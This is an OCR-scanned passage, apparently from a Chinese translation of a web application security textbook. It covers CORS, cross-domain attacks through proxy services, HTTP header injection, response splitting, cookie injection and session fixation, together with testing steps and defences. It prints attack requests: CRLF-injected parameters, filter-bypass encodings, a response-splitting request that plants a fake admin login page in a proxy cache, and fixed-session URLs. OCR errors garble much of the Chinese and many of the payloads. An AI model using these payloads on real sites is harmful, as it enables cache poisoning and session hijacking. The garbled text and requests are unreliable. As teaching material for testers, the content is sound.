要 确定 可 能 执行 双 问 交互 的 域 ， 服 务 器 的 啊 应 中 应 包含 Access- 
Control-Allow-Origin 消 息 涉 ， 其 中 包括 以 逗号 分 隔 的 允许 的 域 列 表 和 通 
配 符 : 

Aecess-Corlrol-Allow-Origin: ' 

在 第 二 种 情况 下 ， 如 果 已 使 用 OPTIONS 请 求 预先 验证 了 跨 域 请 
求 ， 则 可 以 使 用 以 下 消息 头 来 指示 答 试 提出 的 请 求 的 具体 内 容 : 

Access-Contz~9l-Request-Method;: FUT 

Access Control Request Heade~s: X PTINGCTHFR 

为 啊 应 OPTIONS 请 求 ， 服 务 器 可 以 使 用 以 下 消息 头 来 指定 允许 提 
出 的 跨 域 请 求 的 类 型 : 


Access-Control-Allow-Origin: http://wahh-app.com 








Access-Control-Allow-Methods: POST, GET, OPTIONS 
Access-Control-Allow-Headers: X-PINGOTHER 
Access-Control-Max-Age: 1728000 


渗透 测试 步 又 


(1) 要 测试 应 用 程序 如 何 使 用 XMLHttpRequest 处 理 跨 域 请 
求 ， 测 试 员 应 尝试 添加 一 个 用 于 指定 其 他 域 的 Origin 消 息 头 ， 并 检 
得 返回 的 任何 Access-Control 消 息 头 。 人 允许 任何 域 或 指定 的 其 他 域 
Ti 向 访问 导致 的 安全 隐患 与 上 述 Flash 跨 域 策 略 导致 的 安全 隐患 
日 同 。 

C2) 如 果 有 任何 跨 域 访问 受到 支持 ， 则 测试 员 还 应 使 用 
OPTIONS 请 求 来 了 解 到 底 允 许 哪 些 消息 头 和 其 他 请 求 。 


除 可 能 允许 外 部 域 进行 双 同 交互 外 ，XMLHttpRequest 的 新 特性 还 
可 能 导致 利用 Web 应 用 程序 的 特定 功能 的 新 型 攻击 ， 或 新 型 常规 攻击 。 

如 第 12 章 所 述 ， 一 些 应 用 程序 使 用 XMLHttpRequest 同 在 URL 参 数 
中 、 或 在 片断 标识 符 后 指定 的 文件 提出 异步 请 求 。 检 索 到 的 文件 动态 加 
载 到 当前 页 面 的 <div> 中 。 由 于 以 前 不 可 能 使 用 XMLHttpRequest 提 出 跨 
域 请 求 ， 因 此 也 没有 必要 验证 所 请 求 的 项 目 是 否 在 应 用 程序 自身 的 域 
上 。 利 用 新 版 本 的 XMLHttpRequest， 攻 击 者 可 以 在 其 控制 的 域 上 指定 
一 个 URL， 从 而 对 应 用 程序 用 户 实 施 客户 端 远程 文件 包含 攻击 。 

更 常见 的 是 攻击 者 可 以 借助 XMLHttpRequest 的 新 特性 ， 利 用 恶意 
或 被 攻破 的 网 站 ， 通 过 访问 网 站 用 户 的 浏览 占 来 实施 攻击 ， 即 使 这 时 器 
域 访 问 己 遭 到 禁止 。 跨 域 问 口 扫描 表明 ， 使 用 XMLHttpRequest 壬 试问 
任意 主机 和 端口 提出 请 求 ， 并 观察 响应 的 时 间 差 异 ， 可 以 推断 所 请 求 的 
端口 是 否 已 打开 、 关 闭 或 被 过 滤 。 此 外 ， 与 传统 的 生成 跨 域 请 求 的 方法 
相 比 ， 使 用 XMLHttpRequest 可 以 更 快速 地 实施 分 布 式 拒绝 服务 攻击 。 
如 果 目 标 应 用 程序 禁止 跨 域 访问 ， 则 需要 在 URL 参 数 中 增加 一 个 值 ， 以 
确保 每 个 请 求 针 对 不 同 的 URL， 因 此 实际 上 由 浏览 器 提出 。 


13.3.3 ”通过 代理 服务 应 用 程序 跨 二 


一 些 公开 发 布 的 Web 应 用 程序 提供 高 效 的 代理 服务 功能 ， 人 允许 从 不 
同 域 检索 内 容 ， 但 服务 于 代理 Web 应 用 程序 中 的 用 户 。Google 翻 译 
(GT) 就 是 一 个 典型 的 例子 ， 它 可 以 请 求 指定 的 外 部 URL 并 返回 其 内 
容 ， 如 图 13-2 所 示 。 虽然 翻译 引擎 可 能 会 修改 检索 到 的 啊 应 中 的 文 
本 ,但 基本 的 HTML 标 记 和 任何 脚本 代码 仍 保 持 不 变 。) 























gle tansialo impsponpmager rat! lra mas View: @ Transivica © Oina 





wi pot TE 广 
ruder sepeser Oo hep Que les gens disent 
“Burp Suite Pro is an essential 


weapon you must have m your 
arsenal * 


i n i ` ~ “Burp Suite Pro is affordsbkc， 
a ote oe tg (steed is the leading telable and powerlul - ebove af, iL 
Gor edhe Pets the job doner 


> Phe 
Yee pin toolkit for web application <i $ had leds, 1 might ve Burp 
f OS command ree å - more than them.” 

! security testing 





Quo! de neuf? 
Burp Sute v1 4 Whers, avec 
* one r $ CiaPs hauv 
Commencez à utiliser Burp aujourd'hui es 
es contres d'accès et ad 
Découvrez comment Burp peut vous aider manipulobon des séances 
i ji Aperçu óu — de The 
Apprenez a faire plus avec Burp ee oe 





























图 13-2 Google 翻译 可 请 求 外 部 URL， 内 容 ， wa RP FA ADE RIE 
定 的 语言 





如 果 两 个 不 同 的 外 部 域 均 通过 GT 应 用 程序 访问 ， 这 时 可 能 会 一 个 
有 趣 的 问题 。 这 种 情况 下 ， 在 浏览 器 看 来 ， 来 自 每 个 外 部 域 的 内 容 将 驻 
留 在 GT 域 中 ， 因 为 这 是 浏览 器 从 中 检索 内 容 的 域 。 Sal aria 
留 在 同一 个 域 中 ， 它 们 之 间 可 以 进行 双 同 交互 〈 如 果 这 种 交互 也 通 
GT 域 实 施 的 话 〉。 

当然 ， 如 果 用 户 登 录 某 个 外 部 应 用 程序 ， 然 后 通过 GT 访问 该 应 用 
程序 ， 则 该 用 户 的 浏览 器 会 正确 地 将 GT 视 为 其 他 域 。 因 此 ， 用 户 用 于 
外 部 应 用 程序 的 cookie 将 不 会 通过 GT 在 请 求 中 发 送 ， 并 且 也 不 可 能 
任何 其 他 交互 。 同 样 ， 恶 意 网 站 也 无 法 利用 GT 轻松 攻破 其 他 应 用 程序 
上 的 用 户 会 话 。 

但 是 ， 网 站 可 以 利用 GT 等 代理 服务 行为 与 位 于 其 他 域 上 的 应 用 程 
序 的 公开 、 未 授权 的 区 域 进行 双 问 交互 。Jikto 就 是 这 样 的 一 种 攻击 。 
Jikto 是 一 个 概念 验证 蠕虫 ， 通 过 在 Web 应 用 程序 中 查找 并 利用 永久 性 
XSS 漏 洞 ， 从 而 在 应 用 程序 之 间 进 行 传播 。Jikto 代 码 的 基本 运行 机 制 如 


Pa 
口 初 次 运行 时 ， 该 脚本 会 检查 其 是 人 否 在 GT 域 中 运行 。 如 果 不 是 ， 














它 会 通过 GT 域 加载 当 前 URL， 从 而 将 自己 传送 到 GT 域 中 。 

口 该 脚本 通过 GT 请 求 外 部 域 中 的 内 容 。 由 于 该 脚本 自身 在 GT 域 中 
运行 ， 它 可 以 通过 GT 与 任何 其 他 域 上 的 公开 内 容 进行 双向 交互 。 
查 











口 该 脚本 以 JavaScript 实 现 一 个 基本 的 Web 扫 摘 程 计 ， 在 外 部 域 中 探 
永久 性 XSS 漏 洞 。 公 告 牌 等 可 以 公开 访问 的 功能 中 可 能 存在 这 类 漏 





洞 。 
本 a a ee 
部 域 中 。 
口 其 他 用 户 访问 被 攻破 的 外 部 域 时 ， 该 脚本 开始 执行 ， 并 且 这 个 过 
程 会 不 断 目 动 重复 。 


Jikto 蜂 虫 会 设法 利用 XSS 漏 洞 来 传播 上 自己。 但 是 ， 这 种 通过 代理 服 
务 合并 域 的 基本 攻击 技巧 并 不 取决 于 所 针对 的 单个 外 部 应 用 程序 中 的 任 
何 漏洞 ， 也 无 法 进行 有 效 防 御 。 此 外 ， 它 还 是 一 种 有 用 的 攻击 技巧 。 测 
试 员 也 可 以 通过 它 来 了 解 如 何在 非常 规 情 况 下 应 用 同 源 策 略 。 





13.4 其 “IEAI 


到 现在 为 止 ， 我们 介绍 的 许多 攻击 主要 与 利用 某 种 应 用 程序 功能 所 
应 用 程序 响应 中 注入 专门 设计 的 内 容 有 关 。 这 其 中 最 主要 的 攻击 为 XSS 
攻击 。 我 们 还 介绍 了 通过 注入 的 HIML 和 CSS 代 码 跨 域 捕获 数据 的 技 
巧 。 在 这 一 节 中 ， 我 们 将 介绍 其 他 一 些 客户 端 注入 攻击 。 











如 果 用 户 控制 的 数据 以 不 安全 的 方式 插入 到 应 用 程序 返回 的 HTTP 
消息 头 中 ， 这 时 融会 出 现 HTTP 消 息 头 注入 漏洞 。 如 果 攻 击 者 能 够 在 他 
控制 的 消息 头 中 注入 换行 符 ， 他 束 能 在 啊 应 中 插入 其 他 HTTP 消 息 头 、 
并 在 啊 应 主体 中 写 入 任意 内 容 。 

这 种 漏洞 最 常见 于 Location 与 Set-Cookie 消 息 头 中 ， 但 也 会 出 现在 其 
他 HTTP 消 息 头 中 。 前 文 已 经 讲 到 ， 应 用 程序 提取 用 户 提 交 的 输入 ， 并 
将 它 插 入 到 啊 应 码 为 3xx 的 Location 消 息 涉 中 。 同 样 ， 一 些 应 用 程序 提取 
用 户 提 交 的 输入 ， 并 将 其 插入 cookie 值 中 。 例 如 : 


GET /settings/12/Default.aspx?Language=English HTTP/1.1 




















Host: mdsec.net 


HTTP/1.1 200 OK 
Set-Cookie: PreferredLanguage=English 


在 上 述 任何 一 种 情况 下 ， 攻 击 者 都 可 以 使 用 回 车 符 COx0d) 或 换行 
从 《0x0a) 构造 一 个 专门 设计 的 请 求 ， 在 他 们 控制 的 消 轧 关中 注入 一 个 
换行 符 ， 从 而 在 下 面 的 行 中 注入 其 他 数据 。 例 如 : 


GET /settings/12/Default.aspx?Language-English%t0ad%0aFoo:+bar HTTP/1.1 








Host: mdsec.net 


HTTE/1.1 200 OK 
Set-Cookie: PreferredLanguage=En¢lish 


Poo: bar 


1. 利用 消 轧 头 注入 漏洞 
得 找 消息 头 注入 漏洞 的 方法 与 得 找 XSS 漏 洞 的 方法 类 似 ， 同 样 需要 





寻找 用 户 控制 的 输入 重复 出 现在 应 用 程序 返回 的 HITP 消 息 头 中 的 情 
况 。 因 此 ， 在 探查 应 用 程序 是 否 存在 XSS 漏 洞 的 过 程 中 ， 还 应 当 确定 应 
用 程序 可 能 易于 受到 消息 头 注入 的 全 部 位 置 。 





渗透 测试 步 又 


(1) 在 用 户 控 制 的 输入 被 复制 到 HTTP 消 明 头 中 的 每 个 位 置 都 
可 能 存在 漏洞 ， 确 认 应 用 程序 是 人 否 接 受 URL 编 码 的 回 车 符 (%0d) 
与 换行 符 (%0a) ， 以 及 它们 是 否 按 原 样 在 啊 应 中 返回 。 

(2) 注意 ， 是 在 服务 器 的 啊 应 中 而 不 是 换行 符 的 URL 编 码 形 
式 中 寻找 换行 待 本身 。 如 果 通 过 拦截 代理 服务 器 得 看 啊 应 ， 攻 击 成 
功 的 话 ， 应 该 会 在 HITP 消 息 头 中 看 到 另外 一 个 新 行 。 

C3) 如 果 服 务 器 的 响应 中 仪 返回 两 个 换行 符 中 的 一 个 ， 根 据 
实际 情况 ， 仍 然 能 够 设计 出 有 效 的 攻击 方法 。 

C4) 如 果 发 现 换行 符 被 应 用 程序 阻止 或 净化 ， 那 么 应 该 尝试 
以 下 攻击 方法 : 

foo%00%0d%0abar 

foo%250d%250abar 

foo%%0d0dt*0a0abar 

















全 全 警告 有时， 由 于 过 分 依赖 HTML 源 代码 或 浏览 器 插 
件 提供 的 信息 《其 中 并 不 显示 啊 应 消息 头 ) ， 上 述 问 题 可 能 会 被 忽 
aif 因此 ， 应 确保 使 用 拦截 代理 服务 器 工具 读 取 HTTP 响 应 消息 


如 果 能 够 在 啊 应 中 注入 任意 消 妃 头 和 消息 主体 内 容 ， 那 么 这 种 行为 
可 通过 各 种 方式 攻击 应 用 程序 的 其 他 用 户 。 


Al, yn vw) 

AV IA 
http://mdsec.net/settings/12/ 
http://mdsec.net/settings/31/ 


®@ 注入 cookie 

攻击 者 可 以 建立 一 个 URL， 在 请 求 它 的 任何 用 户 的 浏览 器 中 设 定 任 
意 cooike。 例 如 : 

Gi! /secttings/.2/Detau_t.aspx?Language—-lng ishti aser- 

Cookie:tSess_cGt3anlZdalZegbes> tte s/t.t 


Hoss: masec.ne. 


pte eee, Aue OK 
Se.-Coeoke: Prelterrceo Lang uwage-Eng ish 


Se.-Cookle: Sessié-LZJalZc73Ses; 


如 果 进 行 适当 配置 ， 这 些 cookie 可 以 访问 不 同 的 浏览 器 会 话 。 这 
时 ， 通 过 前 面 利用 反射 型 XSS 漏 洞 时 使 用 的 相同 传送 机 制 (电子 邮件 、 
第 三 方 Web 站 点 等 ) ， 就 可 以 诱 使 目标 用 户 访问 恶意 URL。 

@ 传送 其 他 攻击 

因为 HTTP 消息 头 注入 允许 攻击 者 控制 整个 响应 主体 ， 所 以 几乎 任 
何 针 对 其 他 用 户 的 攻击 都 可 以 使 用 它 作为 传送 机 制 ， 包 括 虚 拟 Web 站 点 
置换 、 脚 本 注入 、 任 意 重 定向 、 针 对 ActiveX 控 件 的 攻击 等 。 

@ HTTP 响应 分 割 

这 是 一 种 试图 通过 恶意 内 容 “ 毒 害 ” 代 理 服 务 器 缓存 ， 从 而 攻破 通过 
代理 服务 器 访问 应 用 程序 的 其 他 用 户 的 攻击 技巧 。 例 如 ， 如 果 企 业 网 络 
中 的 所 有 用 户 通过 缓存 代理 服务 器 访问 某 个 应 用 程序 ， 那 么 ， 通 过 在 代 
理 服务 器 的 缓存 中 注入 恶意 内 容 (显示 给 任何 请 求 受 影响 页 面 的 用 
户 ) ， 攻 击 者 就 可 以 癌 这 些 用 户 实施 攻击 。 
攻击 者 可 以 按 以 下 步骤 ， 利 用 消息 头 注入 漏洞 来 实施 响应 分 割 攻 


C1) 攻击 者 在 代理 服务 器 缓存 中 选择 一 个 他 和 希望 "毒害 ”的 应 用 程 
序 页 面 。 例 如 ， 他 可 能 会 用 一 个 木马 登录 表单 《用 于 加 攻击 者 的 服务 需 


























hese uk) 代 蔡 /admin/ 处 的 页 面 。 

(2) 攻击 者 确定 某 个 消息 头 注入 漏洞 ， 构 造 一 个 请 求 ， 在 服务 器 
啊 应 中 注入 一 个 完整 的 HTTP 主 体 以 及 男 一 组 啊 应 消 奶 尖 和 为 一 个 啊 应 
主体 。 第 二 个 啊 应 主体 中 包含 他 的 木马 登录 表单 的 HTML 源 代码 。 这 
样 ， 服 务 器 的 啊 应 看 起 来 就 像 是 两 个 连接 在 一 起 的 单独 HTTP 啊 应 。 因 
此 ， 这 种 技巧 叫做 HTTP 响应 分 割 (HTTP response splitting) ， 因 为 攻 
击 者 已 经 把 服务 器 的 啊 应 “分 割 ? 成 两 个 单独 的 啊 应 。 例 如 : 

GET /settings/_2/Defanlt.aspx?iangueqe=EnglishtictNatentens: Langta:122 

SO0As0as0dsCa<htenl>SO0dsOalocosCdetlax<shtml>tdtockETor/* .14+200+0K2Ods9a 

Conten:-Length: +2397 %0Gs0as0at0a<htrl>%oatNacheac~s0dsCa<title> 

Adninistrator+_ogin</title>Oat0al...lors URL...) I-TTE/1.- 


"SL reseed? neh 


"PAT, YOO OK 
Set GCocxie: PreferredLanguags=Srg_ishk 


fenten: Length: 22 


<html: 
fco 
</html> 


HTTP/1.1 200 OK 
Content-Length: 2307 


<html> 
<head> 
<title>Administrator login</title> 


(3) 攻击 者 与 代理 服务 器 建立 TCP 连 接 ， 传 送 这 个 专门 设计 的 请 
求 ， 后 面 基 跟着 访问 被 “毒害 ”的 页 面 的 请 求 。 在 HITP 协 议 中 ， 以 这 种 
方式 连接 请 求 是 合法 的 。 





GET http: //mdsec.net/settings/12/Default.aspx?Languace=English%0d%0a 


ontent-Length:422%0d%0as0d%0a<html>s0d%0afoos0ds0a< /html>s0as0aHTTP / 
1.14+200+OK¢0d%0aContent-Lencth: +2307%0dt0at0dt0a<hntmi>t0at0a<head>t0dt0a 
<title>Administrator+login</title>Od@0a[...long URL...) HITP/1.1 


Host: mdsec.net 


GET http://mdsec.net/admin/ HTTP/1.1 

teh ee se ry al Close 

(4) 代理 服务 器 与 应 用 程序 建立 TCP 连 接 ， 送 出 这 两 个 以 相同 方 
式 连接 的 请 求 。 


(5) 应 用 程序 用 攻击 者 注入 的 HTTP 内 容 响 应 第 一 个 请 求 ， 它 看 起 
来 就 像 是 两 个 单独 的 HITP 啊 应 。 

(6) 代理 服务 器 收 到 这 两 个 看 似 单独 的 啊 应 ， 并 认为 其 中 第 二 个 
啊 应 与 攻击 者 的 第 二 个 请 求 相 对 应 ， 访 请求 指 向 URL: 
http://mdsec.net/admin/。 代 理 服务 器 把 第 二 个 啊 应 作为 这 个 URL 的 内 容 
保存 在 缓存 中 。〔 如 果 代 理 服务 器 已 经 在 缓存 中 保存 有 该 页 面 的 副本 ， 
那么 攻击 者 就 可 以 在 他 的 第 二 个 请 求 中 插入 一 个 适当 的 If-Modified- 
Since 消 息 头 ， 并 在 注入 的 啊 应 e Bk, PETAR 
理 服务 器 重新 请 求 这 个 URL， 用 新 的 内 容 更 新 它 的 缓存 。 

(7) 应 用 程序 发 布 它 对 攻击 者 的 第 二 个 请 求 的 啊 应 ， 其 中 包 全 
URL http://mdsec.net/admin/ 的 真实 内 容 。 代 理 服 务 器 并 不 认为 它 是 对 它 
发 布 的 请 求 的 啊 应 ， 因 而 抛弃 这 个 啊 应 。 

(8) 一 名 用 户 通 过 代理 服务 器 访问 http://mdsec.net/ladmin/， 并 收 到 
这 个 URL 保 存在 代理 服务 器 缓存 中 的 内 容 。 这 个 内 容 实 际 上 是 攻击 者 的 
AR Ey SRE, a 

实施 这 种 攻击 的 步骤 如 网 13-3 所 示 。 


as GE ?home.php?uid=123 |__ TM spew 
请 求 ! YAI%OaC ontent-Tength... (5) Ise 











f 请 米 1 风 响应 


被 忽略 HVPE. OK 请 求 2 的 响应 























图 13-3 ”用 于 毒害 代理 服务 器 缓存 的 HTTP 响 应 分 割 攻击 涉及 的 步 又 





2. 防止 消息 涉 注入 漏洞 








要 防止 HTTP 消息 头 注 入 漏洞 ， 最 有 效 方法 是 杜绝 将 用 户 控 制 的 输 
入 插入 到 应 用 程序 返回 的 HITP 消 息 头 中 。 如 我 们 在 介绍 任意 重 定向 漏 
洞 时 所 述 ， 通 常 可 以 用 一 些 较为 安全 的 方法 代替 这 种 行为 。 

如 果 不 可 避免 地 要 在 HTTP 消 息 头 中 插入 用 户 控 制 的 数据 ， 那 么 应 
用 程序 应 采取 以 下 双重 深层 防御 方法 防止 漏洞 产生 。 

口 输 入 确认 。 应 用 程序 应 根据 情形 ， 对 插入 的 数据 进行 尽 可 能 严格 
的 确认 。 例 如 ， 如 果 根 据 用 户 输入 设 定 一 个 cookie 值 ， 那 么 应 将 这 个 值 
限制 为 仪 包 含 字 母 字 符 ， 最 大 长 度 为 6 字 市 。 

口 输出 确认 。 应 对 插入 到 消息 头 中 的 所 有 数据 进行 过 滤 ， 检 测 可 能 
的 恶意 字符 。 实 际 上 ， 任 何 ASCII 码 小 于 0x20 的 字符 都 应 被 视 为 可 疑 的 
恶意 字符 ， 应 用 程序 应 拒绝 包含 这 些 字符 的 请 求 。 

只 有 应 用 程序 在 其 SSL 终 止 符 后 未 使 用 缓存 反 同 代理 服务 器 ， 它 才 
能 通过 对 所 有 应 用 程序 内 容 使 用 HTTPS， 防 止 攻击 者 利用 任何 残留 的 消 
县 头 注 入 漏洞 “毒害 ”代理 服务 器 缓存。 


13.4.2 cookie 注入 


在 cookie 攻 击 中 ， 攻 击 者 利用 应 用 程序 功能 或 浏览 器 行为 的 某 种 特 
性 ， 在 受害 用 户 的 浏览 器 中 设置 cookie， 或 修改 该 cookie。 
攻击 者 可 以 通过 各 种 方式 实施 cookie 注 入 攻击 。 
口 某 些 应 用 程序 的 功能 在 请 求 参 数 中 使 用 一 个 名 称 和 值 ， 并 在 啊 应 
的 cookie 中 设置 该 名 称 和 值 。 保 存 用 户 首选 项 大 多 属于 此 类 功能 。 
口 如 前 所 述 ， 如 果 存 在 HTTP 消息 头 注 入 漏洞 ， 就 可 以 利用 此 漏洞 
注入 任意 Set-Cookie 消 息 头 。 
口 可 以 利用 相关 域 中 的 XSS 漏 洞 在 目标 域 上 设置 一 个 cookie。 目 标 
ee 以 及 目标 域 的 父 域 及 其 子 域 ， 都 可 以 通过 这 种 方式 加 以 
FA o 

口 可 以 利用 主动 中 间 人 攻击 (例如 ， 人 针对 公共 无 线 网 络 中 的 用 户 ) 
在 任意 域 上 设置 cookie， 即 使 目标 应 用 程序 仅 使 用 HTTPS 并 且 将 其 
cookie 标 记 为 安全 。 我 们 将 在 本 章 后 面部 分 详细 介绍 这 种 攻击 。 

如 果 攻 击 者 可 以 设置 任意 cookie， 他 就 可 以 利用 该 cookie 以 各 种 方 
式 攻 击 目 标 用 户 : 

口 在 某 些 应 用 程序 中 ， 设 置 一 个 特殊 的 cookie 可 能 会 破坏 应 用 程序 
的 逻辑 ， 给 用 户 造 成 不 利 影响 (例如 ，UseHttps=false〉。 

口 由 于 cookie 通 常 仅 由 应 用 程序 本 里 设置 ， 因 此 它们 会 受 客户 剖 代 
人 码 信 任 。 该 代码 可 能 会 以 各 种 危险 的 方式 《对 攻击 者 可 控制 的 数据 而 
言 ) 处 理 cookie 值 ， 导 致 基于 DOM 的 XSS 或 JavaScript 注 入 。 




















O 除 将 反 CSRF 令 牌 与 用 户 会 话 关 联 外 ， 一 些 应 用 程序 还 在 cookie 和 
请 求 参 数 中 放置 该 令 牌 ， 然 后 对 它们 的 值 进 行 比较 ， 以 防止 CSRF 攻 
击 。 如 果 攻 击 者 可 以 控制 cookie 和 参数 值 ， 就 能 够 避 开 这 种 防御 。 

口 如 本 章 前 面部 分 所 述 ， 攻 击 者 可 以 利用 某 个 永久 性 XSS 漏 洞 ， 通 
过 针对 登录 功能 的 CSRF 攻 击 使 用 户 登 录 攻 击 者 的 账户 ， 并 因此 访问 
XSS 有 效 载 和 荷 。 如 果 登 录 页 面 能 够 有 效 防 范 CSRF， 这 种 攻击 将 无 法 奏 
效 。 但 是 ， 如 果 攻 击 者 能 够 在 用 户 的 浏览 器 中 设置 任意 cookie， 他 就 可 
以 直接 和 癌 用 户 传 送 自 己 的 会 话 令 牌 ， 从 而 成 功 实施 攻击 ， 而 不 必 实 施 针 
对 登录 功能 的 CSRF 攻 击 。 

口 设置 任意 cookie 可 以 对 会 话 固定 漏洞 加 以 利用 《〈 将 在 下 一 节 介 
绍 ) 。 

会 话 固定 

如 果 应 用 程序 在 用 户 首次 访问 它 时 为 每 一 名 用 户 建 立 一 个 匿名 会 
话 ， 这 时 往往 就 会 出 现 会 话 固定 漏洞 。 如 果 应 用 程序 包含 登录 功能 ， 这 
个 匿名 会 话 将 在 用 户 登 录 前 创建 ， 然 后 ， 一 旦 用 户 登 录 ， 该 会 话 即 升级 
econ 0 RH, 会 话 令 牌 并 未 被 赋予 任何 访问 权限 ， 但 当 用 

通过 验证 后 ， 令 脾 也 具有 了 该 用 户 的 访问 权限 。 

在 标准 的 会 | 攻击 者 必须 使 用 某 种 方法 截获 一 名 应 用 
程序 用 户 的 会 话 令 牌 。 另 一 方面 ， 在 会 话 固定 攻击 中 ， 攻 击 者 首先 从 应 
用 程序 中 直接 获得 一 个 匿名 令 牌 ， 然 后 使 用 某 种 方法 将 这 个 令 牌 “ 固 
定 ”* 在 受害 者 的 浏览 器 中 。 用 户 登 录 后 ， 攻 击 者 就 可 以 使 用 该 令 牌 动 持 
这 名 用 户 的 会 话 。 

成 功 实施 这 种 攻击 所 需 的 步骤 如 图 13-4 所 示 。 


























u 
应 用 程序 





(2) 攻击 者 将 会 话 令 牌 传送 给 用 户 `s 


图 13-4 ”实施 会 话 固定 攻击 所 需 的 步 又 





当然 ， 在 这 个 攻击 中 ， 最 关键 的 阶段 应 该 是 攻击 者 问 受 害 者 传送 他 
获得 的 会 话 令 牌 ， 并 令 受 害 者 的 浏览 器 使 用 这 个 令 牌 。 实 现 这 一 目标 的 
方法 因 传送 全 话 令 牌 所 采用 的 机 制 而 异 。 

口 如 果 使 用 HTTP cookie， 攻 击 者 可 以 尝试 使 用 上 一 节 介 绍 的 某 种 
cookie 注 入 技巧 。 

口 如 果 在 URL 参 数 中 传送 会 话 令 牌 ， 则 攻击 者 只 需 问 受害 者 传递 应 
用 程序 向 其 发 布 的 同一 URL: 


https://wahh-app.com/liogin,.php?SessId=12dlalf8S6ef224ab424c2454208 


一 些 应 用 程序 服务 器 接受 在 URL 中 使 用 它们 以 分 号 分 隔 的 会 话 令 
牧 。 一 些 应 用 程序 默认 这 样 做 ， 而 其 他 应 用 程序 则 直接 以 这 种 方式 使 用 
Re 

tet em Sa reiproduct .do;jsessionid=739105723F7AEE6ABC2 


D 如 果 应 用 程序 使 用 ErML 表单 中 的 隐藏 字段 来 传送 全 话 令 牌 ， 攻 
击 者 可 以 利用 CSRF 攻 击 在 用 户 的 浏览 器 中 插入 他 的 令 牌 。 

并 不 提供 登录 机 制 的 应 用 程序 中 也 可 能 存在 会 话 固定 漏洞 。 例 如 ， 
某 应 用 程序 可 能 允许 匿名 用 户 浏览 产品 目录 、 在 购物 篮 中 添加 商品 、 通 











过 提交 个 人 数据 与 文 付 细节 进行 结算 ， 然 后 在 “确认 订单 ?页面 上 审核 这 
些 信 息 。 在 这 种 情况 下 ， 攻 击 者 就 可 以 将 一 个 匿名 会 话 令 牌 固定 到 受害 
者 的 浏览 嚣 中， 等待 该 用 户 提交 订单 并 输入 敏感 信息 ， 然 后 使 用 该 令 牌 
访问 “确认 订单 页面， 截获 该 用 户 的 信息 。 

一 些 Web 应 用 程序 与 Web 服 务 器 接受 用 户 提 交 的 任意 令 牌 ， 即 使 这 
些 令 脾 并 不 是 由 服务 器 在 此 前 发 布 的 。 如 果 收 到 一 个 不 被 认可 的 令 有 牌 ， 
服务 器 会 直接 为 这 个 令 牌 建立 一 个 新 会 话 ， 并 把 它 当 做 服务 器 生成 的 新 
令 牌 处 理 。 过 去 ，Microsoft IIS 与 Allaire ColdFusion 服 务 器 都 存在 这 种 缺 
陷 。 

如 果 一 个 应 用 程序 或 服务 器 以 这 种 方式 运作 ， 它 束 非 常 容易 受到 会 
话 固定 攻击 ， 因 为 攻击 者 根本 不 必 采 取 任 何 措施 确保 固定 在 目标 用 户 的 
浏览 器 中 的 令 牌 当前 有 效 。 攻 击 者 只 需 选择 任意 一 个 令 牌 ， 将 其 尽 可 能 
广 地 进行 分 发 例如， 通过 电子 邮件 癌 个 体 用 户 、 邮 件 列 表 等 发 送 一 个 

含 该 令 脾 的 URL)〉， 然 后 定期 访问 应 用 程序 中 的 某 个 受 保护 页 面 
《如 “用 户 资 料 ”) ， 检 查 受 害 者 何 时 使 用 这 个 令 牌 登录 。 即 使 目标 用 户 
几 个 月 都 没有 访问 这 个 URL， 但 著 意 破坏 的 攻击 者 仍然 有 可 能 劫持 该 用 
户 的 会 话 。 

9 查找 并 利用 会 话 固定 漏洞 

如 果 应 用 程序 文 持 身份 验证 ， 则 应 该 检查 它 如 何 处 理 与 登录 有 关 的 
会 话 令 牌 。 在 下 面 两 种 情况 下 ， 应 用 程序 可 能 易于 受到 攻击 。 

口 应 用 程序 癌 每 名 未 通过 验证 的 用 户 发 布 一 个 匿名 会 话 令 牌 。 在 用 
户 登 录 后 ， 它 并 不 发 布 新 令 牌 ， 相 反 ， 他 们 现 有 的 会 话 被 升级 为 通过 验 
人 

这 种 行为 。 

口 应 用 程序 并 不 同 匿名 用 户 发 布 令 牌 ， 只 有 用 户 成 功 登 录 后 ， 应 用 
程序 才 回 该 用 户 发 布 令 牌 。 但 是 ， 如 果 用 户 使 用 通过 验证 的 令 牌 访问 登 
录 功 能 ， 并 使 用 不 同 的 证 书 登录 ， 则 应 用 程序 并 不 发 布 新 令 牌 ， 相反， 
与 之 前 通过 验证 的 会 话 关 联 的 用 户 喘 份 将 转换 为 第 二 名 用 户 的 映 份 。 

在 这 两 种 情况 下 ， 攻 击 者 都 能 获得 有 效 令 牌 〈 通 过 请 求 登 录 页 面 或 
用 他 目 己 的 证 书 登 录 ) ， 并 将 其 传送 给 目标 用 户 。 当 该 用 户 使 用 这 个 令 
牌 登录 时 ， 攻 击 者 就 能 支持 这 名 用 户 的 会 话 。 












































渗透 测试 步 又 


(1) 通过 任何 可 行 的 办 法 获得 一 个 有 效 令 牌 。 
(2) 访问 登录 表单 并 使 用 这 个 令 牌 登录 。 
D 如 果 登 录 成 功 ， 而 且 应 用 程序 并 不 发 布 新 令 牌 ， 则 表示 
它 易于 受到 会 话 固定 攻击 。 


如 果 一 个 应 用 程序 并 不 支持 验证 ， 但 允许 用 户 提 交 并 审查 敏感 信 
恩 ， 那 么 应 该 确认 用 户 在 提交 敏感 信息 前 后 是 否 使 用 相同 的 会 话 令 牌 。 
如 果 令 牌 没 有 发 生变 化 ， 则 攻击 者 束 可 以 获得 令 牌 ， 并 将 其 传送 给 目标 
用 户 。 用 户 提 交 敏 感 信 息 后 ， 攻 击 者 束 可 以 使 用 该 令 脾 查看 这 名 用 户 的 
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渗透 测试 步 又 


(1) 以 完全 匿名 的 用 尸身 份 获 得 一 个 会 话 令 牌 ， 然 后 完成 提 
交 有 敏感 数据 的 过 程 ， 接 下 来 继续 浏览 ， 直 到 任何 显示 敏感 数据 的 页 
面 。 


(2) 如 果 最 初 获得 的 同一 个 令 牌 现在 可 用 于 获取 人 敏感 数据 ， 
应 用 程序 就 易于 受到 会 话 固定 攻击 。 

C3) 如 果 已 经 发 现任 何 会 话 固定 漏洞 ， 则 应 确定 应 用 程序 是 
个 接受 它 之 前 并 未 发 布 的 任何 令 牌 。 如 宁 接 受 ， 那 么 在 很 长 一 段 时 
间 内 攻击 者 都 可 以 非常 轻松 地 利用 这 个 漏洞 。 


@ 防止 会 话 固定 漏洞 

任何 时 候 ， 只 要 一 名 用 户 与 应 用 程序 的 交互 状态 由 匿名 转变 为 确 
认 ， 应 用 程序 就 应 该 发 布 新 的 会 话 令 牌 。 这 不 仅 适 用 于 用 户 成 功 登 录 的 
